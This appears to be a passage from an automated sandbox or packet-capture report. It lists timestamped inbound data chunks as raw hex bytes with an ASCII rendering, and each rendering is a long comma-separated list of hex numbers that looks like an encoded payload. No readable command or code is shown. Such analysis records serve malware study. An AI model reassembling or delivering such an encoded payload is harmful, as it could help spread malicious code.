2023-03-24 06:58:02 UTC	816	IN	Data Raw: 34 2c 34 62 2c 36 66 2c 31 33 32 2c 39 61 2c 65 31 2c 38 33 2c 61 30 2c 61 66 2c 66 33 2c 37 62 2c 63 36 2c 38 37 2c 38 33 2c 61 37 2c 31 34 33 2c 36 61 2c 62 65 2c 62 39 2c 31 30 39 2c 31 30 66 2c 39 63 2c 31 30 62 2c 37 66 2c 35 35 2c 39 64 2c 62 37 2c 39 63 2c 62 33 2c 31 34 36 2c 37 32 2c 31 31 31 2c 64 63 2c 36 66 2c 37 61 2c 31 33 61 2c 38 38 2c 63 34 2c 39 36 2c 61 63 2c 64 62 2c 31 37 35 2c 38 66 2c 37 31 2c 31 33 33 2c 64 37 2c 64 37 2c 65 30 2c 39 30 2c 35 39 2c 65 38 2c 31 33 63 2c 63 32 2c 31 32 36 2c 31 30 37 2c 31 32 39 2c 35 32 2c 62 38 2c 62 65 2c 65 38 2c 31 34 64 2c 31 31 36 2c 38 62 2c 66 38 2c 31 30 38 2c 31 32 65 2c 38 61 2c 36 34 2c 36 62 2c 39 31 2c 39 31 2c 36 34 2c 66 65 2c 65 35 2c 31 35 30 2c 39 33 2c 31 34 64 2c 34 62 2c 36 38 Data Ascii: 4,4b,6f,132,9a,e1,83,a0,af,f3,7b,c6,87,83,a7,143,6a,be,b9,109,10f,9c,10b,7f,55,9d,b7,9c,b3,146,72,111,dc,6f,7a,13a,88,c4,96,ac,db,175,8f,71,133,d7,d7,e0,90,59,e8,13c,c2,126,107,129,52,b8,be,e8,14d,116,8b,f8,108,12e,8a,64,6b,91,91,64,fe,e5,150,93,14d,4b,68
2023-03-24 06:58:02 UTC	832	IN	Data Raw: 2c 31 34 37 2c 38 30 2c 31 34 36 2c 63 63 2c 31 34 35 2c 31 33 65 2c 31 30 64 2c 66 33 2c 63 35 2c 65 36 2c 63 35 2c 62 63 2c 31 33 32 2c 63 62 2c 61 31 2c 37 65 2c 61 39 2c 63 64 2c 31 32 62 2c 31 36 36 2c 31 33 63 2c 31 34 36 2c 31 32 38 2c 31 30 62 2c 38 38 2c 66 32 2c 61 66 2c 31 30 30 2c 31 33 30 2c 31 31 38 2c 37 63 2c 63 37 2c 31 30 32 2c 36 30 2c 31 33 63 2c 66 64 2c 64 62 2c 31 32 62 2c 35 36 2c 66 62 2c 31 32 35 2c 63 38 2c 31 30 35 2c 31 33 63 2c 66 31 2c 66 39 2c 38 39 2c 63 65 2c 38 61 2c 66 33 2c 31 34 37 2c 31 31 63 2c 64 32 2c 38 34 2c 36 30 2c 31 32 34 2c 31 32 34 2c 31 33 64 2c 31 34 36 2c 62 34 2c 61 34 2c 39 34 2c 31 30 63 2c 31 31 62 2c 39 62 2c 31 30 65 2c 38 62 2c 61 32 2c 31 30 61 2c 65 63 2c 31 30 36 2c 33 32 2c 39 63 2c 63 34 2c Data Ascii: ,147,80,146,cc,145,13e,10d,f3,c5,e6,c5,bc,132,cb,a1,7e,a9,cd,12b,166,13c,146,128,10b,88,f2,af,100,130,118,7c,c7,102,60,13c,fd,db,12b,56,fb,125,c8,105,13c,f1,f9,89,ce,8a,f3,147,11c,d2,84,60,124,124,13d,146,b4,a4,94,10c,11b,9b,10e,8b,a2,10a,ec,106,32,9c,c4,
2023-03-24 06:58:02 UTC	848	IN	Data Raw: 31 36 33 2c 38 36 2c 65 37 2c 39 39 2c 39 63 2c 39 36 2c 63 63 2c 65 63 2c 61 63 2c 62 66 2c 38 30 2c 63 35 2c 64 65 2c 66 30 2c 31 30 34 2c 39 34 2c 31 33 38 2c 31 33 33 2c 66 65 2c 66 33 2c 31 30 39 2c 38 32 2c 31 34 30 2c 31 30 31 2c 66 39 2c 62 66 2c 38 30 2c 31 31 62 2c 38 63 2c 36 64 2c 31 35 37 2c 31 34 64 2c 63 32 2c 34 31 2c 63 30 2c 31 34 36 2c 65 63 2c 31 33 39 2c 37 30 2c 31 30 32 2c 31 33 39 2c 31 30 38 2c 35 34 2c 31 32 65 2c 62 32 2c 34 37 2c 64 33 2c 38 32 2c 37 37 2c 61 34 2c 61 33 2c 31 33 32 2c 63 63 2c 31 36 32 2c 31 34 62 2c 62 34 2c 35 66 2c 62 32 2c 33 35 2c 37 31 2c 31 32 63 2c 31 31 64 2c 63 34 2c 66 66 2c 31 32 65 2c 35 33 2c 31 30 38 2c 37 34 2c 62 61 2c 31 32 33 2c 36 35 2c 31 36 33 2c 36 36 2c 39 30 2c 64 66 2c 31 31 35 2c 37 Data Ascii: 163,86,e7,99,9c,96,cc,ec,ac,bf,80,c5,de,f0,104,94,138,133,fe,f3,109,82,140,101,f9,bf,80,11b,8c,6d,157,14d,c2,41,c0,146,ec,139,70,102,139,108,54,12e,b2,47,d3,82,77,a4,a3,132,cc,162,14b,b4,5f,b2,35,71,12c,11d,c4,ff,12e,53,108,74,ba,123,65,163,66,90,df,115,7
2023-03-24 06:58:02 UTC	864	IN	Data Raw: 63 2c 38 31 2c 36 63 2c 63 38 2c 31 30 37 2c 61 62 2c 31 31 30 2c 64 66 2c 39 33 2c 66 66 2c 61 37 2c 66 64 2c 31 34 66 2c 31 33 61 2c 31 30 36 2c 63 34 2c 31 31 63 2c 36 38 2c 37 38 2c 65 66 2c 61 35 2c 65 66 2c 31 34 32 2c 62 36 2c 65 33 2c 31 34 38 2c 36 38 2c 61 65 2c 39 38 2c 62 33 2c 36 38 2c 62 30 2c 35 30 2c 66 61 2c 36 36 2c 38 61 2c 31 33 37 2c 31 34 34 2c 31 32 65 2c 31 31 64 2c 66 30 2c 31 32 32 2c 62 32 2c 35 39 2c 31 36 39 2c 66 65 2c 31 35 34 2c 62 37 2c 31 34 36 2c 31 32 38 2c 34 33 2c 38 39 2c 35 37 2c 37 39 2c 31 33 36 2c 36 61 2c 33 66 2c 36 65 2c 37 35 2c 64 62 2c 31 30 34 2c 31 31 39 2c 31 30 62 2c 66 62 2c 31 32 66 2c 31 33 33 2c 35 64 2c 66 33 2c 38 37 2c 35 66 2c 64 39 2c 61 62 2c 34 38 2c 36 31 2c 66 34 2c 31 32 38 2c 66 32 2c 39 Data Ascii: c,81,6c,c8,107,ab,110,df,93,ff,a7,fd,14f,13a,106,c4,11c,68,78,ef,a5,ef,142,b6,e3,148,68,ae,98,b3,68,b0,50,fa,66,8a,137,144,12e,11d,f0,122,b2,59,169,fe,154,b7,146,128,43,89,57,79,136,6a,3f,6e,75,db,104,119,10b,fb,12f,133,5d,f3,87,5f,d9,ab,48,61,f4,128,f2,9
2023-03-24 06:58:02 UTC	880	IN	Data Raw: 36 2c 38 30 2c 37 36 2c 65 65 2c 36 35 2c 31 35 62 2c 31 31 35 2c 37 63 2c 36 31 2c 63 64 2c 38 34 2c 31 30 64 2c 64 65 2c 38 35 2c 31 37 38 2c 61 62 2c 31 35 62 2c 62 38 2c 64 30 2c 31 34 61 2c 64 62 2c 35 31 2c 35 62 2c 31 32 30 2c 31 32 63 2c 35 31 2c 61 34 2c 31 34 31 2c 34 34 2c 36 62 2c 35 64 2c 31 33 32 2c 31 36 32 2c 31 32 31 2c 31 30 64 2c 65 66 2c 63 34 2c 31 37 36 2c 62 65 2c 38 64 2c 31 31 30 2c 65 39 2c 31 32 61 2c 37 37 2c 66 66 2c 37 36 2c 31 34 66 2c 31 35 34 2c 31 35 36 2c 31 30 38 2c 63 38 2c 66 34 2c 64 62 2c 65 66 2c 31 30 37 2c 62 63 2c 31 30 66 2c 31 31 62 2c 64 36 2c 63 36 2c 62 39 2c 65 32 2c 66 32 2c 66 35 2c 31 35 38 2c 31 33 38 2c 35 61 2c 62 66 2c 62 61 2c 37 63 2c 37 39 2c 35 39 2c 62 31 2c 62 32 2c 39 37 2c 37 35 2c 38 39 2c Data Ascii: 6,80,76,ee,65,15b,115,7c,61,cd,84,10d,de,85,178,ab,15b,b8,d0,14a,db,51,5b,120,12c,51,a4,141,44,6b,5d,132,162,121,10d,ef,c4,176,be,8d,110,e9,12a,77,ff,76,14f,154,156,108,c8,f4,db,ef,107,bc,10f,11b,d6,c6,b9,e2,f2,f5,158,138,5a,bf,ba,7c,79,59,b1,b2,97,75,89,
2023-03-24 06:58:02 UTC	896	IN	Data Raw: 2c 66 30 2c 31 32 34 2c 36 61 2c 31 35 35 2c 31 30 33 2c 31 32 66 2c 61 63 2c 65 65 2c 38 39 2c 66 32 2c 66 66 2c 64 32 2c 31 30 63 2c 65 33 2c 31 32 39 2c 61 30 2c 36 61 2c 65 33 2c 31 31 31 2c 31 32 63 2c 62 38 2c 65 31 2c 31 30 63 2c 38 31 2c 31 34 32 2c 66 37 2c 39 61 2c 31 33 38 2c 31 32 32 2c 38 62 2c 39 31 2c 62 38 2c 31 32 36 2c 31 33 31 2c 38 30 2c 31 32 36 2c 63 31 2c 31 30 65 2c 38 64 2c 37 30 2c 31 35 65 2c 65 32 2c 35 35 2c 31 30 39 2c 65 36 2c 36 38 2c 31 33 30 2c 36 38 2c 31 31 30 2c 31 33 63 2c 66 34 2c 39 32 2c 62 35 2c 66 65 2c 31 33 31 2c 36 34 2c 35 32 2c 61 30 2c 62 34 2c 39 62 2c 31 31 33 2c 63 66 2c 64 30 2c 31 31 62 2c 31 30 32 2c 39 64 2c 31 34 37 2c 61 65 2c 64 31 2c 36 36 2c 36 65 2c 63 30 2c 31 32 61 2c 31 31 61 2c 31 30 39 2c Data Ascii: ,f0,124,6a,155,103,12f,ac,ee,89,f2,ff,d2,10c,e3,129,a0,6a,e3,111,12c,b8,e1,10c,81,142,f7,9a,138,122,8b,91,b8,126,131,80,126,c1,10e,8d,70,15e,e2,55,109,e6,68,130,68,110,13c,f4,92,b5,fe,131,64,52,a0,b4,9b,113,cf,d0,11b,102,9d,147,ae,d1,66,6e,c0,12a,11a,109,
2023-03-24 06:58:02 UTC	912	IN	Data Raw: 2c 39 33 2c 62 35 2c 66 34 2c 62 39 2c 31 32 39 2c 65 35 2c 66 31 2c 31 32 33 2c 31 31 64 2c 31 35 64 2c 39 36 2c 65 35 2c 31 32 34 2c 36 37 2c 31 32 34 2c 61 37 2c 36 61 2c 38 63 2c 35 61 2c 38 33 2c 31 31 32 2c 66 61 2c 31 31 35 2c 38 61 2c 64 34 2c 31 33 65 2c 31 32 63 2c 31 30 62 2c 62 65 2c 31 35 32 2c 31 30 65 2c 31 34 35 2c 37 37 2c 31 33 64 2c 31 34 39 2c 31 30 31 2c 31 32 61 2c 37 66 2c 36 35 2c 39 32 2c 31 34 63 2c 31 35 38 2c 31 33 34 2c 31 32 31 2c 66 63 2c 61 62 2c 66 30 2c 31 30 63 2c 31 31 61 2c 31 35 35 2c 61 65 2c 37 64 2c 35 38 2c 63 33 2c 31 32 39 2c 31 31 63 2c 31 32 62 2c 66 31 2c 31 33 34 2c 37 37 2c 62 37 2c 65 31 2c 62 65 2c 66 62 2c 64 66 2c 39 39 2c 62 37 2c 31 33 36 2c 35 37 2c 64 34 2c 36 61 2c 66 33 2c 64 36 2c 36 38 2c 61 39 Data Ascii: ,93,b5,f4,b9,129,e5,f1,123,11d,15d,96,e5,124,67,124,a7,6a,8c,5a,83,112,fa,115,8a,d4,13e,12c,10b,be,152,10e,145,77,13d,149,101,12a,7f,65,92,14c,158,134,121,fc,ab,f0,10c,11a,155,ae,7d,58,c3,129,11c,12b,f1,134,77,b7,e1,be,fb,df,99,b7,136,57,d4,6a,f3,d6,68,a9
2023-03-24 06:58:02 UTC	928	IN	Data Raw: 62 2c 63 65 2c 63 30 2c 31 34 63 2c 37 64 2c 65 31 2c 31 31 35 2c 64 63 2c 35 65 2c 62 62 2c 39 64 2c 61 31 2c 65 30 2c 31 31 39 2c 31 33 34 2c 39 38 2c 62 37 2c 65 61 2c 66 33 2c 31 34 66 2c 38 61 2c 31 32 66 2c 65 37 2c 39 31 2c 34 31 2c 64 66 2c 34 66 2c 36 65 2c 31 33 39 2c 36 36 2c 37 33 2c 33 63 2c 31 30 63 2c 62 33 2c 36 63 2c 31 31 33 2c 64 61 2c 31 32 30 2c 36 38 2c 63 34 2c 63 63 2c 31 33 32 2c 61 31 2c 31 30 61 2c 38 64 2c 31 33 64 2c 31 32 39 2c 31 30 31 2c 64 64 2c 31 31 34 2c 36 34 2c 65 37 2c 66 32 2c 31 33 62 2c 66 30 2c 34 39 2c 62 32 2c 66 61 2c 63 34 2c 39 39 2c 31 30 37 2c 63 66 2c 31 34 65 2c 33 64 2c 31 33 64 2c 64 39 2c 31 32 62 2c 39 31 2c 31 32 35 2c 39 61 2c 31 33 63 2c 63 33 2c 36 39 2c 37 62 2c 33 38 2c 31 30 39 2c 31 35 33 2c Data Ascii: b,ce,c0,14c,7d,e1,115,dc,5e,bb,9d,a1,e0,119,134,98,b7,ea,f3,14f,8a,12f,e7,91,41,df,4f,6e,139,66,73,3c,10c,b3,6c,113,da,120,68,c4,cc,132,a1,10a,8d,13d,129,101,dd,114,64,e7,f2,13b,f0,49,b2,fa,c4,99,107,cf,14e,3d,13d,d9,12b,91,125,9a,13c,c3,69,7b,38,109,153,
2023-03-24 06:58:02 UTC	944	IN	Data Raw: 36 30 2c 64 62 2c 37 38 2c 36 35 2c 31 30 36 2c 38 66 2c 31 30 30 2c 31 32 39 2c 65 39 2c 61 37 2c 31 30 35 2c 31 33 37 2c 31 34 34 2c 31 31 65 2c 31 32 65 2c 31 34 32 2c 35 64 2c 31 31 66 2c 31 31 33 2c 31 34 36 2c 64 31 2c 31 31 63 2c 66 36 2c 31 32 31 2c 61 35 2c 63 30 2c 63 39 2c 65 31 2c 31 34 32 2c 63 30 2c 63 61 2c 63 35 2c 63 35 2c 65 30 2c 65 65 2c 35 36 2c 63 31 2c 37 30 2c 64 65 2c 31 32 32 2c 31 34 37 2c 36 66 2c 62 37 2c 62 36 2c 31 32 31 2c 63 66 2c 38 35 2c 61 64 2c 31 30 30 2c 62 62 2c 37 33 2c 65 31 2c 31 30 31 2c 31 32 33 2c 31 35 30 2c 31 33 32 2c 31 32 65 2c 35 38 2c 31 31 30 2c 66 32 2c 31 33 64 2c 31 31 31 2c 62 63 2c 63 30 2c 62 63 2c 31 31 34 2c 61 31 2c 65 34 2c 31 31 39 2c 66 36 2c 31 34 32 2c 36 61 2c 31 32 33 2c 61 61 2c 34 36 Data Ascii: 60,db,78,65,106,8f,100,129,e9,a7,105,137,144,11e,12e,142,5d,11f,113,146,d1,11c,f6,121,a5,c0,c9,e1,142,c0,ca,c5,c5,e0,ee,56,c1,70,de,122,147,6f,b7,b6,121,cf,85,ad,100,bb,73,e1,101,123,150,132,12e,58,110,f2,13d,111,bc,c0,bc,114,a1,e4,119,f6,142,6a,123,aa,46
2023-03-24 06:58:02 UTC	960	IN	Data Raw: 30 66 2c 31 35 34 2c 62 35 2c 31 31 31 2c 37 33 2c 63 38 2c 31 32 36 2c 66 35 2c 31 36 37 2c 31 36 34 2c 63 35 2c 35 33 2c 31 30 62 2c 64 37 2c 31 31 65 2c 31 33 30 2c 63 37 2c 31 32 30 2c 31 33 30 2c 34 61 2c 34 30 2c 31 32 66 2c 35 38 2c 64 62 2c 66 36 2c 31 30 36 2c 39 37 2c 31 30 35 2c 64 61 2c 31 31 65 2c 61 35 2c 31 32 38 2c 39 36 2c 36 33 2c 35 61 2c 64 36 2c 65 34 2c 31 32 63 2c 37 32 2c 66 66 2c 66 62 2c 65 30 2c 37 61 2c 36 66 2c 64 32 2c 31 33 34 2c 33 37 2c 64 62 2c 62 35 2c 31 36 35 2c 31 34 38 2c 31 30 31 2c 31 32 64 2c 66 31 2c 38 33 2c 61 36 2c 64 30 2c 39 65 2c 37 33 2c 64 32 2c 35 30 2c 38 35 2c 31 31 66 2c 31 30 32 2c 31 31 64 2c 31 34 63 2c 39 35 2c 35 30 2c 38 35 2c 31 33 32 2c 31 30 35 2c 31 30 30 2c 31 37 32 2c 36 64 2c 62 32 2c 36 Data Ascii: 0f,154,b5,111,73,c8,126,f5,167,164,c5,53,10b,d7,11e,130,c7,120,130,4a,40,12f,58,db,f6,106,97,105,da,11e,a5,128,96,63,5a,d6,e4,12c,72,ff,fb,e0,7a,6f,d2,134,37,db,b5,165,148,101,12d,f1,83,a6,d0,9e,73,d2,50,85,11f,102,11d,14c,95,50,85,132,105,100,172,6d,b2,6
2023-03-24 06:58:02 UTC	976	IN	Data Raw: 31 32 30 2c 31 32 34 2c 65 39 2c 31 30 64 2c 61 35 2c 33 32 2c 37 65 2c 31 30 38 2c 31 32 36 2c 31 36 37 2c 38 33 2c 61 66 2c 63 37 2c 31 35 39 2c 31 31 63 2c 31 31 32 2c 31 32 33 2c 39 36 2c 39 36 2c 31 31 37 2c 66 32 2c 39 32 2c 61 39 2c 35 38 2c 37 62 2c 31 34 34 2c 66 37 2c 31 33 35 2c 31 32 31 2c 64 34 2c 63 37 2c 35 39 2c 66 39 2c 65 62 2c 64 37 2c 63 62 2c 65 64 2c 66 33 2c 31 33 38 2c 35 39 2c 31 31 65 2c 65 33 2c 37 39 2c 31 31 39 2c 37 31 2c 66 36 2c 62 64 2c 31 30 35 2c 31 34 66 2c 31 31 31 2c 37 65 2c 31 34 64 2c 37 37 2c 37 34 2c 62 64 2c 39 64 2c 31 33 61 2c 31 34 33 2c 66 64 2c 36 62 2c 66 34 2c 31 32 35 2c 64 61 2c 38 32 2c 65 62 2c 63 63 2c 66 63 2c 31 31 62 2c 38 34 2c 62 37 2c 36 62 2c 31 33 32 2c 36 37 2c 38 34 2c 65 65 2c 31 30 36 2c Data Ascii: 120,124,e9,10d,a5,32,7e,108,126,167,83,af,c7,159,11c,112,123,96,96,117,f2,92,a9,58,7b,144,f7,135,121,d4,c7,59,f9,eb,d7,cb,ed,f3,138,59,11e,e3,79,119,71,f6,bd,105,14f,111,7e,14d,77,74,bd,9d,13a,143,fd,6b,f4,125,da,82,eb,cc,fc,11b,84,b7,6b,132,67,84,ee,106,
2023-03-24 06:58:02 UTC	992	IN	Data Raw: 63 33 2c 31 31 38 2c 65 34 2c 31 32 61 2c 37 62 2c 63 37 2c 38 38 2c 31 36 34 2c 36 36 2c 38 64 2c 36 36 2c 64 30 2c 31 30 34 2c 66 36 2c 63 61 2c 35 62 2c 61 35 2c 31 34 37 2c 31 34 65 2c 31 34 32 2c 66 34 2c 31 30 39 2c 39 37 2c 37 33 2c 66 35 2c 31 33 31 2c 63 36 2c 66 33 2c 31 35 65 2c 63 34 2c 37 61 2c 64 65 2c 31 32 36 2c 64 30 2c 31 34 65 2c 61 30 2c 64 30 2c 37 38 2c 31 30 31 2c 64 62 2c 35 63 2c 34 64 2c 66 65 2c 39 39 2c 65 63 2c 31 36 38 2c 31 31 63 2c 61 39 2c 62 35 2c 31 34 32 2c 31 33 63 2c 37 65 2c 31 33 65 2c 66 65 2c 31 31 65 2c 31 32 64 2c 31 31 39 2c 31 34 65 2c 31 35 37 2c 31 35 30 2c 38 61 2c 31 31 61 2c 63 31 2c 63 35 2c 63 63 2c 38 36 2c 35 38 2c 31 34 34 2c 36 36 2c 31 30 65 2c 37 63 2c 64 37 2c 65 65 2c 64 63 2c 31 33 39 2c 31 31 Data Ascii: c3,118,e4,12a,7b,c7,88,164,66,8d,66,d0,104,f6,ca,5b,a5,147,14e,142,f4,109,97,73,f5,131,c6,f3,15e,c4,7a,de,126,d0,14e,a0,d0,78,101,db,5c,4d,fe,99,ec,168,11c,a9,b5,142,13c,7e,13e,fe,11e,12d,119,14e,157,150,8a,11a,c1,c5,cc,86,58,144,66,10e,7c,d7,ee,dc,139,11
2023-03-24 06:58:02 UTC	1008	IN	Data Raw: 39 2c 63 63 2c 31 31 65 2c 36 37 2c 64 34 2c 31 34 39 2c 31 32 32 2c 31 33 63 2c 63 34 2c 62 66 2c 31 30 33 2c 63 35 2c 38 37 2c 31 31 66 2c 64 32 2c 31 33 35 2c 61 30 2c 36 66 2c 31 31 34 2c 66 32 2c 38 64 2c 33 66 2c 39 38 2c 31 31 37 2c 31 33 66 2c 37 34 2c 61 39 2c 31 32 61 2c 39 34 2c 35 64 2c 31 31 62 2c 31 31 35 2c 65 39 2c 63 63 2c 63 38 2c 39 61 2c 62 66 2c 66 64 2c 31 33 65 2c 31 37 31 2c 62 33 2c 64 31 2c 35 63 2c 38 63 2c 39 33 2c 62 62 2c 31 30 36 2c 63 34 2c 31 33 64 2c 31 32 38 2c 33 65 2c 38 61 2c 62 36 2c 66 39 2c 61 37 2c 37 30 2c 63 66 2c 31 35 34 2c 31 30 64 2c 37 62 2c 64 37 2c 61 37 2c 31 32 66 2c 61 37 2c 65 33 2c 63 36 2c 61 65 2c 64 30 2c 39 31 2c 62 66 2c 61 33 2c 63 39 2c 31 30 65 2c 35 66 2c 31 33 32 2c 63 66 2c 31 32 39 2c 37 Data Ascii: 9,cc,11e,67,d4,149,122,13c,c4,bf,103,c5,87,11f,d2,135,a0,6f,114,f2,8d,3f,98,117,13f,74,a9,12a,94,5d,11b,115,e9,cc,c8,9a,bf,fd,13e,171,b3,d1,5c,8c,93,bb,106,c4,13d,128,3e,8a,b6,f9,a7,70,cf,154,10d,7b,d7,a7,12f,a7,e3,c6,ae,d0,91,bf,a3,c9,10e,5f,132,cf,129,7
2023-03-24 06:58:02 UTC	1024	IN	Data Raw: 2c 31 30 35 2c 31 32 36 2c 31 32 39 2c 62 66 2c 31 34 36 2c 66 61 2c 39 35 2c 31 33 30 2c 65 38 2c 64 31 2c 37 62 2c 31 33 35 2c 63 35 2c 38 65 2c 31 33 32 2c 31 31 62 2c 61 63 2c 38 30 2c 31 30 61 2c 31 32 62 2c 62 35 2c 31 36 64 2c 39 31 2c 63 39 2c 36 30 2c 66 36 2c 31 31 35 2c 31 33 39 2c 31 31 36 2c 31 32 63 2c 31 32 39 2c 36 61 2c 35 63 2c 38 64 2c 31 33 63 2c 31 33 33 2c 31 34 39 2c 35 30 2c 62 33 2c 31 31 38 2c 64 66 2c 63 38 2c 31 31 65 2c 37 32 2c 64 39 2c 31 31 61 2c 31 32 63 2c 31 31 66 2c 39 63 2c 61 62 2c 65 64 2c 64 31 2c 62 62 2c 61 30 2c 31 34 66 2c 31 31 38 2c 31 31 37 2c 65 37 2c 31 30 32 2c 63 37 2c 62 32 2c 39 37 2c 31 36 36 2c 31 30 32 2c 31 32 37 2c 31 32 64 2c 31 35 34 2c 31 31 37 2c 63 63 2c 36 37 2c 63 37 2c 31 34 65 2c 31 35 31 Data Ascii: ,105,126,129,bf,146,fa,95,130,e8,d1,7b,135,c5,8e,132,11b,ac,80,10a,12b,b5,16d,91,c9,60,f6,115,139,116,12c,129,6a,5c,8d,13c,133,149,50,b3,118,df,c8,11e,72,d9,11a,12c,11f,9c,ab,ed,d1,bb,a0,14f,118,117,e7,102,c7,b2,97,166,102,127,12d,154,117,cc,67,c7,14e,151
2023-03-24 06:58:02 UTC	1040	IN	Data Raw: 31 30 39 2c 32 64 2c 36 33 2c 64 64 2c 31 34 35 2c 31 31 37 2c 65 38 2c 31 36 34 2c 63 33 2c 31 32 35 2c 62 66 2c 31 30 61 2c 31 31 32 2c 62 36 2c 31 34 32 2c 66 64 2c 31 30 66 2c 31 32 37 2c 61 38 2c 34 66 2c 64 32 2c 37 32 2c 31 34 65 2c 66 61 2c 65 62 2c 63 32 2c 31 34 37 2c 64 63 2c 31 35 35 2c 62 66 2c 37 33 2c 37 39 2c 64 39 2c 62 61 2c 31 30 38 2c 37 36 2c 65 65 2c 63 38 2c 39 39 2c 66 36 2c 35 63 2c 65 35 2c 31 30 64 2c 31 31 65 2c 61 34 2c 61 37 2c 31 30 38 2c 31 32 37 2c 34 66 2c 31 31 64 2c 31 33 30 2c 62 39 2c 34 62 2c 31 31 66 2c 31 34 36 2c 61 36 2c 61 35 2c 37 66 2c 31 32 62 2c 31 32 38 2c 31 31 34 2c 65 31 2c 37 61 2c 63 34 2c 31 32 61 2c 31 30 39 2c 36 62 2c 66 63 2c 61 64 2c 66 39 2c 31 31 65 2c 39 31 2c 31 32 32 2c 66 34 2c 63 36 2c 37 Data Ascii: 109,2d,63,dd,145,117,e8,164,c3,125,bf,10a,112,b6,142,fd,10f,127,a8,4f,d2,72,14e,fa,eb,c2,147,dc,155,bf,73,79,d9,ba,108,76,ee,c8,99,f6,5c,e5,10d,11e,a4,a7,108,127,4f,11d,130,b9,4b,11f,146,a6,a5,7f,12b,128,114,e1,7a,c4,12a,109,6b,fc,ad,f9,11e,91,122,f4,c6,7
2023-03-24 06:58:02 UTC	1056	IN	Data Raw: 38 63 2c 37 39 2c 31 30 62 2c 61 64 2c 37 37 2c 31 33 33 2c 31 31 38 2c 39 37 2c 61 37 2c 65 35 2c 64 36 2c 63 38 2c 36 31 2c 35 37 2c 63 30 2c 65 32 2c 66 31 2c 31 34 37 2c 31 33 32 2c 66 66 2c 38 39 2c 31 33 34 2c 64 38 2c 39 36 2c 31 33 63 2c 63 31 2c 37 39 2c 31 34 34 2c 35 30 2c 31 31 37 2c 31 32 31 2c 31 30 34 2c 62 34 2c 62 39 2c 31 32 61 2c 38 38 2c 31 35 33 2c 31 30 65 2c 38 63 2c 31 32 65 2c 31 32 65 2c 38 30 2c 31 33 35 2c 37 64 2c 38 30 2c 31 31 65 2c 31 35 31 2c 31 33 38 2c 61 30 2c 31 37 38 2c 31 35 36 2c 31 34 32 2c 31 31 31 2c 65 33 2c 31 31 39 2c 31 31 61 2c 31 31 36 2c 35 38 2c 37 33 2c 31 30 34 2c 62 30 2c 63 31 2c 65 66 2c 66 33 2c 36 62 2c 31 33 34 2c 37 63 2c 61 34 2c 61 39 2c 34 37 2c 62 65 2c 31 32 36 2c 39 35 2c 31 30 62 2c 36 64 Data Ascii: 8c,79,10b,ad,77,133,118,97,a7,e5,d6,c8,61,57,c0,e2,f1,147,132,ff,89,134,d8,96,13c,c1,79,144,50,117,121,104,b4,b9,12a,88,153,10e,8c,12e,12e,80,135,7d,80,11e,151,138,a0,178,156,142,111,e3,119,11a,116,58,73,104,b0,c1,ef,f3,6b,134,7c,a4,a9,47,be,126,95,10b,6d
2023-03-24 06:58:02 UTC	1072	IN	Data Raw: 31 34 64 2c 37 66 2c 39 62 2c 31 35 36 2c 64 65 2c 31 30 66 2c 61 39 2c 61 32 2c 65 63 2c 36 34 2c 37 62 2c 31 33 35 2c 61 32 2c 31 34 65 2c 38 62 2c 35 38 2c 31 35 63 2c 34 38 2c 31 31 66 2c 37 64 2c 39 64 2c 61 34 2c 31 33 32 2c 66 35 2c 66 62 2c 31 32 38 2c 31 32 61 2c 65 34 2c 31 31 38 2c 31 34 39 2c 36 36 2c 31 31 62 2c 31 34 32 2c 63 65 2c 36 31 2c 31 35 39 2c 31 35 62 2c 31 30 38 2c 64 63 2c 31 33 35 2c 66 61 2c 31 32 39 2c 63 61 2c 62 39 2c 31 35 61 2c 35 63 2c 38 30 2c 34 64 2c 38 35 2c 66 32 2c 36 38 2c 39 38 2c 31 31 38 2c 31 33 63 2c 31 34 35 2c 36 36 2c 38 30 2c 61 62 2c 31 34 38 2c 31 35 34 2c 31 33 31 2c 37 33 2c 36 37 2c 66 30 2c 31 33 63 2c 31 33 63 2c 31 30 64 2c 37 61 2c 31 32 32 2c 31 31 61 2c 62 37 2c 65 63 2c 39 31 2c 31 30 35 2c 64 Data Ascii: 14d,7f,9b,156,de,10f,a9,a2,ec,64,7b,135,a2,14e,8b,58,15c,48,11f,7d,9d,a4,132,f5,fb,128,12a,e4,118,149,66,11b,142,ce,61,159,15b,108,dc,135,fa,129,ca,b9,15a,5c,80,4d,85,f2,68,98,118,13c,145,66,80,ab,148,154,131,73,67,f0,13c,13c,10d,7a,122,11a,b7,ec,91,105,d
2023-03-24 06:58:02 UTC	1088	IN	Data Raw: 31 36 32 2c 38 32 2c 37 31 2c 64 38 2c 31 31 62 2c 65 36 2c 31 33 32 2c 38 63 2c 38 30 2c 31 30 35 2c 38 39 2c 66 38 2c 38 62 2c 62 65 2c 36 61 2c 39 63 2c 65 39 2c 65 65 2c 65 35 2c 39 31 2c 66 35 2c 31 31 35 2c 61 31 2c 65 62 2c 35 63 2c 39 31 2c 37 64 2c 37 37 2c 62 63 2c 61 38 2c 62 34 2c 65 65 2c 39 62 2c 39 35 2c 31 31 38 2c 36 61 2c 31 33 61 2c 61 33 2c 31 33 64 2c 31 31 37 2c 64 30 2c 38 65 2c 36 35 2c 36 31 2c 64 37 2c 64 62 2c 31 34 37 2c 37 31 2c 64 65 2c 31 31 34 2c 31 32 33 2c 33 34 2c 31 34 37 2c 66 39 2c 31 30 39 2c 36 61 2c 62 62 2c 64 30 2c 31 34 35 2c 37 31 2c 64 34 2c 63 38 2c 31 30 34 2c 31 34 33 2c 31 35 39 2c 66 34 2c 36 34 2c 31 32 34 2c 37 38 2c 31 31 36 2c 36 66 2c 61 39 2c 36 34 2c 31 31 37 2c 65 36 2c 36 66 2c 31 31 35 2c 31 34 Data Ascii: 162,82,71,d8,11b,e6,132,8c,80,105,89,f8,8b,be,6a,9c,e9,ee,e5,91,f5,115,a1,eb,5c,91,7d,77,bc,a8,b4,ee,9b,95,118,6a,13a,a3,13d,117,d0,8e,65,61,d7,db,147,71,de,114,123,34,147,f9,109,6a,bb,d0,145,71,d4,c8,104,143,159,f4,64,124,78,116,6f,a9,64,117,e6,6f,115,14
